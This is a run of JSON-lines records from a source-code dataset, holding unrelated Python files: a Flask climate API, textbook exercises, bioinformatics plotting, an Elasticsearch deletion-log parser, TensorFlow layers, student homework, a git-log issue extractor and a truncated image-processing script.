\n\n@app.route(\"/api/v1.0//\")\ndef startend_date(start,end):\n session = Session(engine)\n temp2_results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n session.close()\n return jsonify(temp2_results)\n\nsession.close()\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"541216099","text":"\"\"\"Python: Programming in Context (2e)\"\"\"\n__author__ = 'ncoop'\n\nfrom chapter2 import *\n\nimport math\nsides = 10\ndiff = 1\nprint(\"{:5s} | {:s} | {:s} | {:s} | {:s}\".format(\n \"sides\", \"arch_pi\".center(18),\n \"math.pi - arch_pi\".center(18), \"math.pi - leib_pi\".center(18), \"math.pi - wall_pi\".center(18)))\nwhile diff > 1e-5:\n arch_pi = archimedes(sides)\n diff = math.pi - arch_pi\n print(\"{:5d} | {:.16f} | {:.16f} | {:.16f} | {:.16f}\".format(\n sides, arch_pi, diff, math.pi - leibniz_mod(sides), math.pi - wallis_mod(sides)))\n sides += 10\nprint()\n\nprint(\"%2s | %19s | %19s\" % (\"n\", \"fibonacci\".center(19), \"factorial\".center(19)))\nprint(\"%2s | %9s %9s | %9s %9s\" % (\"\", \"iterative\", \"recursive\", \"iterative\", \"recursive\"))\nfor i in range(10):\n j = i+1\n print(\"%2d | %9d %9d | %9d %9d\" % (j, fibonacci(j), fib_rec(j), factorial(j), fact_rec(j)))\n","sub_path":"chapter2-tests.py","file_name":"chapter2-tests.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"570084085","text":"#!/usr/bin/env python \n# Copyright (c) 2009-2010 Simon van Heeringen \n#\n# This module is free software. You can redistribute it and/or modify it under \n# the terms of the MIT License, see the file COPYING included with this \n# distribution.\n\nfrom gimmemotifs.fasta import *\nfrom gimmemotifs.motif import *\nimport pp\nimport sys\nfrom optparse import OptionParser\n\nparser = OptionParser()\nparser.add_option(\"-p\", \"--pwmfile\", dest=\"pwmfile\", help=\"File with pwms\", metavar=\"FILE\")\nparser.add_option(\"-f\", \"--fastafile\", dest=\"fastafile\", help=\"Fasta formatted file\", metavar=\"FILE\")\nparser.add_option(\"-w\", \"--width\", dest=\"width\", help=\"Set width to W (default: determined from fastafile)\", metavar=\"W\", type=\"int\")\nparser.add_option(\"-i\", \"--ids\", dest=\"ids\", help=\"Comma-seperated list of motif ids to plot in ROC (default is all ids)\", metavar=\"IDS\")\nparser.add_option(\"-c\", \"--cutoff\", dest=\"cutoff\", help=\"Cutoff to use (default 0.95)\", type=\"float\", default=0.95)\n\n(options, args) = parser.parse_args()\n\ndef motif_localization(fastafile, motif, width, outfile, cutoff=0.9):\n\tNR_HIST_MATCHES = 100\n\tfrom gimmemotifs.utils import plot_histogram, ks_pvalue\n\tfrom gimmemotifs.fasta import Fasta\n\tfrom numpy import array\n\n\tmatches = motif.pwm_scan(Fasta(fastafile), cutoff=cutoff, nreport=NR_HIST_MATCHES)\n\tif len(matches) > 0:\n\t\tar = []\n\t\tfor a in matches.values():\n\t\t\tar += a\n\t\tmatches = array(ar)\n\t\tp = ks_pvalue(matches, width - len(motif))\n\t\tplot_histogram(matches - width / 2 + len(motif) / 2, outfile, xrange=(-width / 2, width / 2), breaks=21, title=\"%s (p=%0.2e)\" % (motif.id, p), xlabel=\"Position\")\n\t\treturn motif.id, p\n\telse:\n\t\treturn motif.id, 1.0\n\nif not options.fastafile and not options.pwmfile:\n\tparser.print_help()\n\tsys.exit()\n\nfastafile = options.fastafile\npwmfile = options.pwmfile\n\nlwidth = options.width\nif not lwidth:\n\tf = Fasta(fastafile)\n\tlwidth = len(f.items()[0][1])\n\tf = None\n\njob_server = pp.Server(secret=\"pumpkinrisotto\")\njobs = []\nmotifs = pwmfile_to_motifs(pwmfile)\nids = [motif.id for motif in motifs]\nif options.ids:\n\tids = options.ids.split(\",\")\n\nfor motif in motifs:\n\tif motif.id in ids:\n\t\toutfile = os.path.join(\"%s_histogram\" % motif.id)\n\t\tjobs.append(job_server.submit(motif_localization, (fastafile,motif,lwidth,outfile, options.cutoff), (),()))\n\nfor job in jobs:\n\tjob()\n","sub_path":"scripts/motif_localization_plots.py","file_name":"motif_localization_plots.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"98121429","text":"#!/usr/bin/python3\n# coding: utf-8\n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n# \n# forked from the FINC Project\n\n\n\"\"\"\nBSZ deletion line parsing to delete Records out of an elasticsearch server\ndeletions.py $(find -L /var/finc/data/import/002 -type f -name \"LOEPPN-*\")\n\"\"\"\n\n\n__version_info__ = ('2019','04','29')\n__version__ = '-'.join(__version_info__)\n\n# from finc.mappings import * \n# from finc.services import *\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\nimport logging\nimport argparse\nimport datetime\nimport time, os\nimport sys\nimport traceback\nfrom requests import get, delete\n\n# root = logging.getLogger()\n# if root.handlers:\n# for handler in root.handlers:\n# root.removeHandler(handler)\n\ngetstrings=[\"http://194.95.145.44:9200/persons/schemaorg/\",\n \"http://194.95.145.44:9200/works/schemaorg/\",\n \"http://194.95.145.44:9200/tags/schemaorg/\",\n \"http://194.95.145.44:9200/events/schemaorg/\",\n \"http://194.95.145.44:9200/orga/schemaorg/\",\n \"http://194.95.145.44:9200/geo/schemaorg/\",\n \"http://194.95.145.44:9200/swb-aut/mrc/\",\n #\"http://194.95.145.24:9201/finc-main/mrc/_search?q=980.__.a.keyword=\"\n ]\n\nclass LoeschLeser(object):\n\n def __init__(self, args):\n self.logger = logging.getLogger(__file__)\n self.ppn_deletions = {}\n self.epn_deletions = {}\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n pass\n\n def process_line(self, line, since=None, ilns=[]):\n\n # dissect line\n __date = line[0:5] # YYDDD, WTF\n __time = line[5:11] # HHMMSS\n\n __date_sane = ''\n try:\n __date_sane = (\n datetime.datetime(\n int('20%s' % __date[0:2]), # year\n 1, # month\n 1, # date\n int(__time[0:2]), # hour\n int(__time[2:4]), # minute\n int(__time[4:6])) + \n datetime.timedelta(int(__date[2:5])-1) # the delta, #1388\n ) #.isoformat() # .strftime('%Y%m%d%H%M')\n # print(__date_sane, file=sys.stderr)\n except Exception as exc:\n self.logger.error('error parsing date: %s' % exc)\n # print('error parsing date: %s' % exc, file=sys.stderr)\n \n d_type = line[11:12]\n # xpn, since this could be ppn or epn; it is an epn, if d_type == 9; it is a ppn if d_type == A\n # 2018-05-17: #13108 longer EPNs\n ## __xpn = line[12:21]\n __xpn = line[12:22]\n ## __iln = line[21:25] # only in epns\n __iln = line[22:26] # only in epns\n\n\n # filter\n\n if since:\n if __date_sane < since:\n # print(\"not adding ppn/epn of date %s\" % __date_sane, file=sys.stderr)\n return\n\n # https://wiki.bsz-bw.de/doku.php?id=v-team:daten:datendienste:sekkor\n if d_type == '9':\n self.epn_deletions[__xpn] = __date_sane\n\n if ilns and len(__iln) > 0: # no iln for ppns / title deletions\n intiln = int(__iln)\n if intiln not in ilns:\n self.logger.debug(\"not adding ppn/epn to iln %s\" % __iln)\n return\n\n if d_type == 'A':\n self.ppn_deletions[__xpn] = __date_sane\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='deletions.py', description='delete bsz ppns out of your EFRE LOD Elasticsearch Server')\n parser.add_argument('-V', '--version', action='version', version=\"{prog}s ({version})\".format(prog=\"%(prog)\", version=__version__))\n # parser.add_argument('-v', '--verbose', action='store_true')\n parser.add_argument('infile', type=str, nargs='*')\n parser.add_argument('--since', type=str, help='collect ppns/epns since given date only, yyyy-mm-dd format') #, default='2013-01-01')\n parser.add_argument('--ilns', type=str, help='collect ppns/epns of specified ilns only, comma separated') # 5,10,20,27,48,50,57,61,89,97,161,400\n parser.add_argument('--dtype', type=str, help='output either only ppns (ppn), epns (epn), or both (all)', default=\"ppn\")\n\n args = parser.parse_args()\n\n date_since = None\n if args.since:\n date_since = datetime.datetime.strptime(args.since, '%Y-%m-%d')\n\n ilns = []\n if args.ilns:\n ilns = [int(iln) for iln in args.ilns.split(',')]\n\n logging.basicConfig(\n # filename='/var/log/mdma.log',\n filename='/dev/stderr',\n filemode='w',\n level=logging.INFO,\n format='%(asctime)s | %(levelname)8s | %(name)s | %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n # multiple with ... python 2.7 or contextlib\n\n start = datetime.datetime.now()\n\n with LoeschLeser(args) as lm:\n for infile in args.infile:\n lm.logger.info(\"reading file %s\" % infile)\n with open(infile) as handle:\n\n # timestamp = datetime.datetime.strptime(time.ctime(os.path.getctime(args.infile)), \"%a %b %d %H:%M:%S %Y\")\n\n for i, line in enumerate(handle, 1):\n try:\n lm.process_line(line, since=date_since, ilns=ilns)\n except Exception as exc:\n lm.logger.error('error parsing %s: %s' % (line, exc))\n lm.logger.error(traceback.format_exc())\n\n # lm.logger.info(\"%d deletions in %d seconds (%d bytes). printing to stdout ...\" % ( len(lm.deletions), ( datetime.datetime.now() - start ).seconds, sys.getsizeof(lm.deletions)) )#, file=sys.stderr)\n if args.dtype in ('all', 'epn'):\n for xpn,dat in lm.epn_deletions.items():\n print(\"%s %s\" % (xpn, dat.strftime('%Y%m%d%H%M')))\n outputset=set()\n if args.dtype in ('all', 'ppn'):\n for xpn,dat in lm.ppn_deletions.items():\n for getstring in getstrings:\n r=get(getstring+xpn.strip())\n if r.ok and r.json()[\"found\"]:\n outputset.add(getstring[:25]+\"/\"+r.json()[\"_index\"]+\"/\"+r.json()[\"_type\"]+\"/\"+r.json()[\"_id\"])\n #delete(getstring[:25]+\"/\"+r.json()[\"_index\"]+\"/\"+r.json()[\"_type\"]+\"/\"+r.json()[\"_id\"])\n for item in outputset:\n print(item)\n#\t\t\t\tprint(\"%s\" % (xpn))\n","sub_path":"helperscripts/deletions.py","file_name":"deletions.py","file_ext":"py","file_size_in_byte":6929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"257891817","text":"from app import mqtt, socketio\nfrom flask import Blueprint\nimport json\n\ncommunications = Blueprint('communications', __name__)\n\n\n@mqtt.on_connect()\ndef handle_connect(client, userdata, flags, rc):\n mqtt.subscribe('test')\n\n\n@mqtt.on_message()\ndef handle_mqtt_message(client, userdata, message):\n data = dict(\n topic=message.topic,\n payload=message.payload.decode()\n )\n socketio.emit('new_data', json.dumps({\"message\": data['payload']}))\n\n\n# @socketio.on('test_socket')\n# # def handle_socketio_test(message):\n# # socketio.emit('new_data', json.dumps({\"test\": message}))","sub_path":"app/communications/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"120786444","text":"import numpy as np\nimport scipy.stats as st\n\nEXPONENTIAL_DIST = st.expon\n\nunit_normalize = lambda v: v/np.linalg.norm(v)\ndegress_between = lambda v1, v2: np.rad2deg(angle_between(v1, v2))\nedot = lambda v1, v2: np.einsum('ij,ij->i', v1, v2)\n\ndef angle_between(v1, v2):\n v1_u = unit_normalize(v1)\n v2_u = unit_normalize(v2)\n angle = np.arccos(np.dot(v1_u, v2_u))\n if np.isnan(angle):\n if (v1_u == v2_u).all():\n return 0.0\n else:\n return np.pi\n return angle\n\ndef angles_between_many_unit_vectors(v1, v2):\n \"\"\"Requires unit vectors\"\"\"\n return np.arccos(edot(v1, v2))\n\nimport scipy.sparse\ndef is_symmetric(m):\n if m.shape[0] != m.shape[1]:\n raise ValueError('m must be a square matrix')\n if not isinstance(m, scipy.sparse.coo_matrix):\n m = scipy.sparse.coo_matrix(m)\n r, c, v = m.row, m.col, m.data\n tril_no_diag = r > c\n triu_no_diag = c > r\n if triu_no_diag.sum() != tril_no_diag.sum():\n return False\n rl = r[tril_no_diag]\n cl = c[tril_no_diag]\n vl = v[tril_no_diag]\n ru = r[triu_no_diag]\n cu = c[triu_no_diag]\n vu = v[triu_no_diag]\n sortl = np.lexsort((cl, rl))\n sortu = np.lexsort((ru, cu))\n vl = vl[sortl]\n vu = vu[sortu]\n check = np.allclose(vl, vu)\n return check\n\nfrom scipy.spatial import Delaunay\ndef in_hull(p, hull):\n \"\"\"\n Test if points in `p` are in `hull`\n\n `p` should be a `NxK` coordinates of `N` points in `K` dimensions\n `hull` is either a scipy.spatial.Delaunay object or the `MxK` array of the \n coordinates of `M` points in `K`dimensions for which Delaunay triangulation\n will be computed\n \"\"\"\n if not isinstance(hull,Delaunay):\n hull = Delaunay(hull)\n return hull.find_simplex(p)>=0\n\ndef gaussian_mle(samples):\n n = len(samples)\n u = samples.mean()\n s = (1.0/n)*((samples-u)**2).sum()\n _ = -(samples-u)**2/(2*s**2)\n return (1.0/(s*np.sqrt(2*np.pi)))*np.exp(_)\n\n# def exponential_mle(samples):\n# l = 1.0/samples.mean()\n# print l\n# return l*np.exp(-l*samples)\n\ndef exponential_mle(samples):\n parms = EXPONENTIAL_DIST.fit(samples)\n return EXPONENTIAL_DIST.pdf(samples, *parms)\n\n\ndef unit_normalize(X):\n Y = X-X.min()\n Z = Y/Y.max()\n return Z\n\nDEFAULT_BETA = 90.0\nDEFAULT_EPS = 1e-5\ndef grady_gauss(X, beta=DEFAULT_BETA, eps=DEFAULT_EPS):\n return np.exp(-(beta*X))+eps\n","sub_path":"cloudlab/math_helpers.py","file_name":"math_helpers.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"217760796","text":"# -*- coding: utf-8 -*-\ndef somaimpares(a):\n soma=0\n for i in range(0,len(a),1):\n if a[i]%2==1:\n soma=soma+a[i]\n print(soma)\nn=int(input('Digite quantidade de elementos: '))\na=[]\nfor i in range(0,n,1):\n valor=int(input('Digite um elemento: '))\n a.append(valor)\n \nprint(somaimpares(a))\n\ndef somapares(b):\n soma=0\n for i in range(0,len(b),1):\n if b[i]%2==0:\n soma=soma+a[i]\n print(soma)\nn=int(input('Digite quantidade de elementos: '))\nb=[]\nfor i in range(0,n,1):\n valor2=int(input('Digite um elemento: '))\n b.append(valor2)\n \ndef cimpares(c):\n cont=0\n for i in range(0,len(c),1):\n if c[i]%2==1:\n cont=cont+1\n return(cont)\nn=int(input('Digite quantidade de elementos: '))\nc=[]\nfor i in range(0,n,1):\n valor3=int(input('Digite um elemento: '))\n c.append(valor3)\n\ndef cpares(d):\n cont=0\n for i in range(0,len(d),1):\n if d[i]%2==0:\n cont=cont+1\n return(cont)\nn=int(input('Digite quantidade de elementos: '))\nd=[]\nfor i in range(0,n,1):\n valor4=(input('Digite um elemento: '))\n d.append(valor4)\n","sub_path":"moodledata/vpl_data/84/usersdata/230/56994/submittedfiles/lista1.py","file_name":"lista1.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"388562879","text":"import tensorflow as tf\r\n\r\n\r\ndef variable_summaries(var, name=None):\r\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\r\n with tf.name_scope(name):\r\n with tf.name_scope('summaries'):\r\n mean = tf.reduce_mean(var)\r\n tf.summary.scalar('mean', mean)\r\n with tf.name_scope('stddev'):\r\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\r\n std_summ = tf.summary.scalar('stddev', stddev)\r\n max_summ = tf.summary.scalar('max', tf.reduce_max(var))\r\n min_summ = tf.summary.scalar('min', tf.reduce_min(var))\r\n his_summ = tf.summary.histogram('histogram', var)\r\n\r\n tf.add_to_collection('train_summary', std_summ)\r\n tf.add_to_collection('train_summary', max_summ)\r\n tf.add_to_collection('train_summary', min_summ)\r\n tf.add_to_collection('train_summary', his_summ)\r\n\r\n\r\ndef conv(input,\r\n filter,\r\n strides,\r\n padding,\r\n acti_func=tf.nn.relu,\r\n wd=None,\r\n bias=None,\r\n name=None):\r\n with tf.variable_scope(name) as scope:\r\n # kernel = tf.get_variable('weight',\r\n # shape=filter,\r\n # dtype=tf.float32,\r\n # initializer=tf.truncated_normal_initializer(stddev=0.1))\r\n kernel = tf.Variable(initial_value=tf.truncated_normal(filter, stddev=0.1), name='weight')\r\n variable_summaries(kernel, 'weight')\r\n\r\n if wd is not None:\r\n weight_decay = tf.multiply(tf.nn.l2_loss(kernel), wd, name='weight_loss')\r\n tf.add_to_collection('losses', weight_decay)\r\n\r\n if bias is not None:\r\n # bias = tf.get_variable('bias',\r\n # filter[-1],\r\n # dtype=tf.float32,\r\n # initializer=tf.constant_initializer(bias))\r\n bias = tf.Variable(tf.constant(bias, shape=[filter[-1]]), name='bias')\r\n variable_summaries(bias, 'bias')\r\n\r\n convolution = tf.nn.conv2d(input, kernel, strides=strides, padding=padding)\r\n act = acti_func(convolution + bias, name='activation')\r\n his_summ = tf.summary.histogram('activations', act)\r\n tf.add_to_collection('train_summary', his_summ)\r\n return act\r\n\r\n\r\ndef pool(input,\r\n ksize=[1, 1, 3, 1],\r\n strides=[1, 1, 3, 1],\r\n padding='SAME',\r\n pool_func=tf.nn.max_pool,\r\n name=None):\r\n with tf.variable_scope(name) as scope:\r\n return pool_func(input, ksize=ksize, strides=strides, padding=padding, name=name)\r\n\r\n\r\ndef unfold(input, name=None):\r\n with tf.variable_scope(name) as scope:\r\n input = tf.reduce_mean(input,1)\r\n num_batch, width, num_channels = input.get_shape()\r\n #num_batch, height, width, num_channels = input.get_shape()\r\n output = tf.reshape(input, [-1, num_channels])\r\n return output\r\n\r\n\r\ndef fc(input,\r\n output_dim,\r\n input_dim=None,\r\n acti_func=tf.nn.relu,\r\n wd=None,\r\n name=None):\r\n with tf.variable_scope(name) as scope:\r\n # input_dim = tf.shape(input)[1]\r\n if input_dim is None:\r\n num_batch, input_dim = input.get_shape()\r\n input_dim = input_dim.value\r\n weights = tf.get_variable('weight',\r\n shape=[input_dim, output_dim],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.1))\r\n # weights = tf.Variable(tf.truncated_normal(shape=[input_dim.value, output_dim], stddev=0.1), name='weight')\r\n variable_summaries(weights, 'weight')\r\n if wd is not None:\r\n weight_decay = tf.multiply(tf.nn.l2_loss(weights), wd, name='weight_loss')\r\n tf.add_to_collection('losses', weight_decay)\r\n\r\n bias = tf.get_variable('bias',\r\n output_dim,\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.0))\r\n # bias = tf.Variable(tf.constant(0.0, shape=[output_dim]), name='bias')\r\n variable_summaries(bias, 'bias')\r\n output = tf.matmul(input, weights) + bias\r\n output = acti_func(output)\r\n his_summ = tf.summary.histogram('activations', output)\r\n tf.add_to_collection('train_summary', his_summ)\r\n return output\r\n\r\n","sub_path":"CNNDetector/tflib/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"466661662","text":"\"\"\"Assignment 01: Hash Functions.\n\nECE 590: Natural Language Processing\nPatrick Wang\n\"\"\"\n\nimport random\nimport numpy as np\n\nfrom hw01_solution import to_str_invertible, to_int_invertible, to_int_uniform, to_int_nonuniform\n\n\nNUM_CODE_POINTS = int('0x110000', 16)\n\n\ndef random_unicode(num_chars):\n \"\"\"Generate a random Unicode character.\"\"\"\n return ''.join([chr(random.randrange(NUM_CODE_POINTS)) for _ in range(num_chars)])\n\n\ndef test_uniform():\n \"\"\"Test to_int_uniform() function.\"\"\"\n # generate random unicode strings\n strings = [random_unicode(4) for _ in range(1000)]\n # has strings to ints\n values = [to_int_uniform(string) for string in strings]\n print('\\nShould be close to 500:')\n print(sum(values))\n\n\ndef test_nonuniform():\n \"\"\"Test to_int_nonuniform() function.\"\"\"\n # generate random unicode strings\n strings = [random_unicode(4) for _ in range(1000)]\n # hash strings to integers\n values = [to_int_nonuniform(string) for string in strings]\n # compute histogram of integers\n hist, _ = np.histogram(values, bins=100, range=(0, 100))\n print('\\nShould be nonuniform:')\n print(hist)\n\n\ndef test_invertible():\n \"\"\"Test to_int_invertible() and to_str_invertible() functions.\"\"\"\n # hash string to integer\n value = to_int_invertible('hello')\n # un-hash integer back to string\n string = to_str_invertible(value)\n print('\\nShould say \"hello\":')\n print(string)\n\n\nif __name__ == \"__main__\":\n test_uniform()\n test_nonuniform()\n test_invertible()\n","sub_path":"hw01_evaluate.py","file_name":"hw01_evaluate.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"229974921","text":"import re\nimport subprocess\nfrom datetime import datetime\nfrom collections import Counter\n\nimport sys\nfrom Utils import util\n\nproject_name_list = [\"your project here (lower case)\"]\nproject_name_dict_for_issue_display = {\"avro\": \"AVRO\",\n \"zookeeper\": \"ZOOKEEPER\", \"tez\": \"TEZ\",\n \"chukwa\": \"CHUKWA\", \"knox\": \"KNOX\"}\n\ndef initialize_dict(dic):\n dic['issue_id'] = set()\n dic['author_date'] = None\n dic['commit_date'] = None\n\ndef match_basic_regexp(text, regexp):\n match = re.match(regexp, text)\n info = None\n if match:\n info = match.group(1)\n return info\n\ndef match_issue_regexp(text, regexp_msg, regexp_issue):\n match_msg = re.match(regexp_msg, text)\n issue_ids=[]\n if match_msg:\n issue_ids = re.findall(regexp_issue, match_msg.group(1))\n #if len(issue_ids)==0:\n # issue_ids=[]\n\n return issue_ids\n\ndef extract_datetime_from_string(target):\n return datetime.strptime(target, \"%a %b %d %H:%M:%S %Y %z\")\n\ndef insert_basicdate_info(text, regexp, dic, key):\n data = match_basic_regexp(text, regexp)\n if data:\n dic[key] = extract_datetime_from_string(data)\n\ndef parse_log(log, p_name):\n \"\"\"\n Returns:\n return_dict [dict>] -- key name list: author_date, commit_date, issue_id\n \"\"\"\n re_commit = r'^commit ([0-9a-f]{5,40})$'\n re_authordate = r'^AuthorDate:\\s+(.*)$'\n re_commitdate = r'^CommitDate:\\s+(.*)$'\n re_msg = r'^\\s+(.*)$'\n re_issue_id = r'{0}-[0-9]*'.format(project_name_dict_for_issue_display[p_name])\n\n return_dict = {}\n cur_commit_hash = None\n for row in log.splitlines():\n #for regexp in re_list:\n # info = match_basic_regexp(row, regexp)\n commit_hash = match_basic_regexp(row, re_commit)\n if commit_hash:\n cur_commit_hash = commit_hash\n if not commit_hash in return_dict:\n return_dict[commit_hash] = {}\n initialize_dict(return_dict[commit_hash])\n\n insert_basicdate_info(row, re_authordate, return_dict[cur_commit_hash], 'author_date')\n insert_basicdate_info(row, re_commitdate, return_dict[cur_commit_hash], 'commit_date')\n\n issue_ids = match_issue_regexp(row, re_msg, re_issue_id)\n for issue_id in issue_ids:\n return_dict[cur_commit_hash]['issue_id'].add(issue_id)\n\n return return_dict\n\n\ndef count_issue(parsed_log_dict, p_name):\n issue_id_list = []\n for commit_hash in parsed_log_dict.keys():\n for issue_id in parsed_log_dict[commit_hash]['issue_id']:\n issue_id_list.append(issue_id)\n\n issue_id_set = set(issue_id_list)\n print(\"number of issue: {0}\".format(len(issue_id_list)))\n print(\"number of unique issue: {0}\".format(len(issue_id_set)))\n #print(\"Count issue:\")\n #cnt = Counter(issue_id_list)\n #print(cnt)\n\n all_target_issue_set = set(util.load_pickle(\"./issues_list/{0}_issue_list.pickle\".format(project_name_dict_for_issue_display[p_name])))\n print(\"number of all target issues: {0}\".format(len(all_target_issue_set)))\n diff_all2log = len(all_target_issue_set - issue_id_set)\n print(\"proportion of detected issues by log message (all - log): {0}({1:,}/{2:,})\".format(round(1-(diff_all2log/len(all_target_issue_set)), 3), len(all_target_issue_set) - diff_all2log, len(all_target_issue_set)))\n \ndef git_log_all(dirname):\n log = subprocess.check_output(\n ['git', '-C', '{}'.format(dirname), 'log', '--all', '--pretty=fuller'],\n universal_newlines=True\n )\n return log\n\n\ndef process_log(p_name):\n log = git_log_all(\"./../repository/{0}\".format(p_name))\n #print(log)\n\n parsed_log_dict = parse_log(log, p_name)\n util.dump_pickle(\"./data_{0}/{1}_log_message_info.pickle\".format(project_name_dict_for_issue_display[p_name], p_name), parsed_log_dict)\n count_issue(parsed_log_dict, p_name)\n\ndef main():\n for p_name in project_name_list:\n process_log(p_name)\n\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"prepare_data/extract_issues/check_all_log_repository.py","file_name":"check_all_log_repository.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"418688261","text":"# -*- coding: utf-8 -*-\r\n# @Time : 1/26/18 11:15 AM\r\n# @Author : Zhu Junwei\r\n\r\n# import sys\r\n# sys.path.append('.')\r\n\r\nimport os\r\nimport requests\r\nimport multi_task_resnet\r\nimport torch\r\nimport transforms\r\nfrom torch.autograd import Variable\r\nfrom torch.nn import functional\r\nfrom PIL import Image\r\nimport pic_similarity\r\nimport shutil\r\nimport logging\r\nimport collections\r\nimport numpy as np\r\nimport hashlib\r\ntry:\r\n import cv2\r\nexcept:\r\n import cv2\r\n\r\n_FILE_SLIM=100*1024*1024\r\ndef File_md5(filename):\r\n calltimes = 0 #分片的个数\r\n hmd5 = hashlib.md5()\r\n fp = open(filename, \"rb\")\r\n f_size = os.stat(filename).st_size #得到文件的大小\r\n if f_size > _FILE_SLIM:\r\n while (f_size > _FILE_SLIM):\r\n hmd5.update(fp.read(_FILE_SLIM))\r\n f_size /= _FILE_SLIM\r\n calltimes += 1 # delete #文件大于100M时进行分片处理\r\n if (f_size > 0) and (f_size <= _FILE_SLIM):\r\n hmd5.update(fp.read())\r\n else:\r\n hmd5.update(fp.read())\r\n return (hmd5.hexdigest(), calltimes)\r\n\r\ndata_transform = transforms.Compose([\r\n transforms.Resize((320, 320)),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n ])\r\nheaders = {\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\r\n \"Proxy-Connection\": \"keep-alive\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\r\n \"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n # 'Connection': 'close',\r\n}\r\n\r\ndef imresize(src, height):\r\n ratio = src.shape[0] * 1.0 / height\r\n width = int(src.shape[1] * 1.0 / ratio)\r\n return cv2.resize(src, (width, height))\r\n\r\n#获取图像背景平均亮度及前景粗略轮廓\r\ndef get_mainitem_mask_rough(im):\r\n \"\"\"\r\n :param im:\r\n :return: 背景平均亮度,前景mask\r\n \"\"\"\r\n # 检查背景\r\n gray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)\r\n gray400 = imresize(gray, 400)\r\n # 边缘锐化\r\n kenerl3x3 = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])\r\n gray400 = cv2.filter2D(gray400, cv2.CV_8UC1, kenerl3x3)\r\n canny400 = cv2.Canny(gray400, 20, 50)\r\n canny400 = np.where(canny400 == 255, 1, 0).astype('uint8')\r\n\r\n kernel7 = cv2.getStructuringElement(cv2.MORPH_RECT, (7, 7))\r\n canny400 = cv2.morphologyEx(canny400, cv2.MORPH_CLOSE, kernel7)\r\n image, contours, hierarchy = cv2.findContours(canny400, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n # cv2.drawContours(image,contours,-1,(255,255,255))\r\n # cv2.imshow('canny',image)\r\n # cv2.waitKey(0)\r\n # 获取前景mask\r\n for contour in contours:\r\n newcontour = contour.reshape(contour.shape[0], contour.shape[2])\r\n cv2.fillPoly(canny400, [newcontour], (1, 1, 1))\r\n # cv2.imshow('canny300',canny300*255)\r\n # cv2.waitKey(0)\r\n kernel9 = cv2.getStructuringElement(cv2.MORPH_RECT, (9, 9))\r\n canny400 = cv2.dilate(canny400,kernel9)\r\n bg400 = np.where(canny400 == 0, gray400, 0).astype('uint8')\r\n bgArea = np.where(canny400 == 0, 1, 0).sum()\r\n\r\n # # bgr三通道的均值\r\n # im300 = imresize(im,300)\r\n # averageB = round(np.where(canny300 == 0, im300[:, :, 0], 0).sum() / (bgArea + 0.0001))\r\n # averageG = round(np.where(canny300 == 0, im300[:, :, 1], 0).sum() / (bgArea + 0.0001))\r\n # averageR = round(np.where(canny300 == 0, im300[:, :, 2], 0).sum() / (bgArea + 0.0001))\r\n # print(averageB, averageG, averageR)\r\n\r\n # 背景平均亮度\r\n aveBg = 0\r\n if (bgArea*10>canny400.shape[0]*canny400.shape[1]) or (bgArea*20>canny400.shape[0]*canny400.shape[1] and len(contours)==2):\r\n aveBg = round(bg400.sum() / bgArea)\r\n cannyorg = imresize(canny400,im.shape[0])\r\n # image, contours, hierarchy = cv2.findContours(cannyorg, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n # cv2.imshow('2',cannyorg*255)\r\n # cv2.waitKey(0)\r\n return 